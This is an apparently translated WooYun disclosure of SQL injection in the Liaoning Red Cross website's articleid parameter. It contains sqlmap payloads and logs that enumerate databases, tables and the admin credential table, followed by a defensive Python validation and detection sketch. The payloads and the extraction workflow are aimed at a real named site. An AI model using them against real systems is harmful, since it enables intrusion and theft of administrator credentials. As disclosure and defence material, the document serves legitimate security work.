Vulnerability summary

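Bug ID: wooyun-2014-080132

Title: Liaoning Provincial Red Cross has a SQL injection vulnerability

Vendor: Liaoning Provincial Red Cross

Author: Mr.Ghost

Submitted: 2014-10-21 12:48

Fixed: 2014-12-05 12:50

Published: 2014-12-05 12:50

Type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]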


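Vulnerability details

Disclosure status:

2014-10-21: Details reported to the vendor; awaiting vendor handling
2014-10-25: Vendor confirmed; details disclosed to the vendor only
2014-11-04: Details disclosed to core white hats and experts in related fields
2014-11-14: Details disclosed to regular white hats
2014-11-24: Details disclosed to intern white hats
2014-12-05: Details disclosed to the public

Brief description:

The official website of the Liaoning Provincial Red Cross has a SQL injection vulnerability. Also asking for an invitation code while I'm at it.

Detailed description:

www.lnredcross.org.cn/web/content.asp?id=46&articleid=1006
The parameter vulnerable to injection is: articleid
Ran the tool against it directly: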

sqlmap identified the following injection points with a total of 19 HTTP(s) requests:
---
Place: GET
Parameter: articleid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=46&articleid=1006 AND 9983=9983
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[14:56:14] [INFO] testing Microsoft SQL Server
[14:56:14] [INFO] confirming Microsoft SQL Server
[14:56:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[14:56:15] [INFO] fetching database names
[14:56:16] [INFO] the SQL query used returns 9 entries
[14:56:16] [INFO] retrieved: hongshiziyimai
[14:56:16] [INFO] retrieved: jijinhui
[14:56:17] [INFO] retrieved: lnredcross
[14:56:17] [INFO] retrieved: master
[14:56:20] [INFO] retrieved: model
[14:56:20] [INFO] retrieved: msdb
[14:56:20] [INFO] retrieved: Northwind
[14:56:24] [INFO] retrieved: pubs
[14:56:27] [INFO] retrieved: tempdb
available databases [9]:
[*] hongshiziyimai
[*] jijinhui
[*] lnredcross
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[15:01:12] [INFO] fetching tables for database 'lnredcross'
[15:01:21] [INFO] the SQL query used returns 35 entries
[15:01:21] [INFO] retrieved: dbo.D99_Tmp
[15:01:22] [INFO] retrieved: dbo.dtproperties
[15:01:22] [INFO] retrieved: dbo.NC_Account
[15:01:22] [INFO] retrieved: dbo.NC_Adboard
[15:01:26] [INFO] retrieved: dbo.NC_AddMoney
[15:01:26] [INFO] retrieved: dbo.NC_Adlist
[15:01:26] [INFO] retrieved: dbo.NC_Admin
[15:01:27] [INFO] retrieved: dbo.NC_Announce
[15:01:27] [INFO] retrieved: dbo.NC_Article
[15:01:27] [INFO] retrieved: dbo.NC_Card
[15:01:28] [INFO] retrieved: dbo.NC_Channel
[15:01:30] [INFO] retrieved: dbo.NC_Classify
[15:01:30] [INFO] retrieved: dbo.NC_Comment
[15:01:30] [INFO] retrieved: dbo.NC_Config
[15:01:31] [INFO] retrieved: dbo.NC_Confirm
[15:01:31] [INFO] retrieved: dbo.NC_DownAddress
[15:01:31] [INFO] retrieved: dbo.NC_DownServer
[15:01:32] [INFO] retrieved: dbo.NC_Favorite
[15:01:32] [INFO] retrieved: dbo.NC_FlashList
[15:01:35] [INFO] retrieved: dbo.NC_Friend
[15:01:36] [INFO] retrieved: dbo.NC_GuestBook
[15:01:36] [INFO] retrieved: dbo.NC_GuestReply
[15:01:36] [INFO] retrieved: dbo.NC_Link
[15:01:37] [INFO] retrieved: dbo.NC_Message
[15:01:37] [INFO] retrieved: dbo.NC_Online
[15:01:37] [INFO] retrieved: dbo.NC_Paymode
[15:01:38] [INFO] retrieved: dbo.NC_ScriptFile
[15:01:38] [INFO] retrieved: dbo.NC_SoftList
[15:01:38] [INFO] retrieved: dbo.NC_Special
[15:01:39] [INFO] retrieved: dbo.NC_Template
[15:01:48] [INFO] retrieved: dbo.NC_User
[15:01:48] [INFO] retrieved: dbo.NC_UserGroup
[15:01:48] [INFO] retrieved: dbo.NC_Vote
[15:01:49] [INFO] retrieved: dbo.sysconstraints
[15:01:53] [INFO] retrieved: dbo.syssegments
Database: lnredcross
[35 tables]
+--------------------+
| dbo.D99_Tmp |
| dbo.NC_Account |
| dbo.NC_Adboard |
| dbo.NC_AddMoney |
| dbo.NC_Adlist |
| dbo.NC_Admin |
| dbo.NC_Announce |
| dbo.NC_Article |
| dbo.NC_Card |
| dbo.NC_Channel |
| dbo.NC_Classify |
| dbo.NC_Comment |
| dbo.NC_Config |
| dbo.NC_Confirm |
| dbo.NC_DownAddress |
| dbo.NC_DownServer |
| dbo.NC_Favorite |
| dbo.NC_FlashList |
| dbo.NC_Friend |
| dbo.NC_GuestBook |
| dbo.NC_GuestReply |
| dbo.NC_Link |
| dbo.NC_Message |
| dbo.NC_Online |
| dbo.NC_Paymode |
| dbo.NC_ScriptFile |
| dbo.NC_SoftList |
| dbo.NC_Special |
| dbo.NC_Template |
| dbo.NC_User |
| dbo.NC_UserGroup |
| dbo.NC_Vote |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------+
[15:05:00] [INFO] fetching columns for table 'dbo.NC_Admin' on database 'lnredcross'
[15:05:01] [INFO] the SQL query used returns 11 entries
[15:05:01] [INFO] retrieved: Adminflag
[15:05:03] [INFO] retrieved: int
[15:05:03] [INFO] retrieved: AdminGrade
[15:05:04] [INFO] retrieved: int
[15:05:04] [INFO] retrieved: id
[15:05:04] [INFO] retrieved: int
[15:05:05] [INFO] retrieved: isAloneLogin
[15:05:05] [INFO] retrieved: nvarchar
[15:05:05] [INFO] retrieved: isLock
[15:05:06] [INFO] retrieved: nvarchar
[15:05:06] [INFO] retrieved: Loginip
[15:05:06] [INFO] retrieved: nvarchar
[15:05:07] [INFO] retrieved: LoginTime
[15:05:07] [INFO] retrieved: nvarchar
[15:05:07] [INFO] retrieved: password
[15:05:12] [INFO] retrieved: nvarchar
[15:05:13] [INFO] retrieved: RandomCode
[15:05:13] [INFO] retrieved: nvarchar
[15:05:15] [INFO] retrieved: status
[15:05:16] [INFO] retrieved: nvarchar
[15:05:16] [INFO] retrieved: username
[15:05:16] [INFO] retrieved: nvarchar
Database: lnredcross
Table: dbo.NC_Admin
[11 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Adminflag | int |
| AdminGrade | int |
| id | int |
| isAloneLogin | nvarchar |
| isLock | nvarchar |
| Loginip | nvarchar |
| LoginTime | nvarchar |
| password | nvarchar |
| RandomCode | nvarchar |
| status | nvarchar |
| username | nvarchar |
+--------------+----------+
[15:06:59] [INFO] fetching columns 'username, password' entries for table 'dbo.NC_Admin' on database 'lnredcross'
[15:06:59] [INFO] retrieved: 13
[15:06:59] [INFO] fetching number of distinct values for column 'username'
[15:07:00] [INFO] retrieved: 13
[15:07:00] [INFO] using column 'username' as a pivot for retrieving row data
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] N
Database: lnredcross
Table: dbo.NC_Admin
[13 entries]

Proof of vulnerability:


Remediation:

Strengthen the input filtering.

Copyright notice: please credit the source when reposting: Mr.Ghost@WooYun
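
As an added example (not part of the original report or the site's code), the Python sketch below shows one form the recommended filtering can take: numeric keys such as `articleid` are accepted only as digits and bound as query parameters, and the same check flags the two probe shapes from the sqlmap output in logged query strings. The sample query strings, the SQLite stand-in for SQL Server and the `channel` and `title` columns are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qsl

# Query-string keys that content.asp uses as numeric identifiers (from the report's URL).
NUMERIC_PARAMS = ("id", "articleid")
# Shapes of the two probes shown in the sqlmap output.
BOOLEAN_PROBE = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
ERROR_PROBE = re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)

def parse_numeric(raw):
    """Return raw as an int only if it is 1-9 ASCII digits, otherwise None."""
    return int(raw) if re.fullmatch(r"[0-9]{1,9}", raw) else None

def audit_query(query_string):
    """Return (parameter, reason) pairs for numeric keys carrying non-numeric values."""
    findings = []
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name.lower() not in NUMERIC_PARAMS or parse_numeric(value) is not None:
            continue
        if ERROR_PROBE.search(value):
            reason = "error-based probe"
        elif BOOLEAN_PROBE.search(value):
            reason = "boolean-based probe"
        else:
            reason = "non-numeric value"
        findings.append((name, reason))
    return findings

def fetch_article(conn, raw_id, raw_articleid):
    """Validate both keys, then bind them as parameters instead of concatenating."""
    channel_id, article_id = parse_numeric(raw_id), parse_numeric(raw_articleid)
    if channel_id is None or article_id is None:
        return None  # rejected before any SQL text is built
    row = conn.execute(
        "SELECT title FROM NC_Article WHERE channel = ? AND id = ?",
        (channel_id, article_id),
    ).fetchone()
    return row[0] if row else None

def demo_db():
    """In-memory SQLite stand-in; the channel and title columns are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE NC_Article (id INTEGER, channel INTEGER, title TEXT)")
    conn.execute("INSERT INTO NC_Article VALUES (1006, 46, 'constructed row')")
    return conn

# Constructed query strings in the form a web server log would record them.
SAMPLE_QUERIES = [
    "id=46&articleid=1006",
    "id=46&articleid=1006+AND+9983%3D9983",
    "id=46&articleid=1006%20AND%208171%3DCONVERT(INT%2C(CHAR(58)))",
    "id=46&articleid=abc",
]

if __name__ == "__main__":
    conn = demo_db()
    for qs in SAMPLE_QUERIES:
        params = dict(parse_qsl(qs))
        print(qs, audit_query(qs), fetch_article(conn, params["id"], params["articleid"]))
```

Because the value is rejected unless it is all digits and is then bound rather than concatenated, neither probe shape ever reaches the SQL text.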


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-10-25 23:44

Vendor reply:

Latest status:

None yet

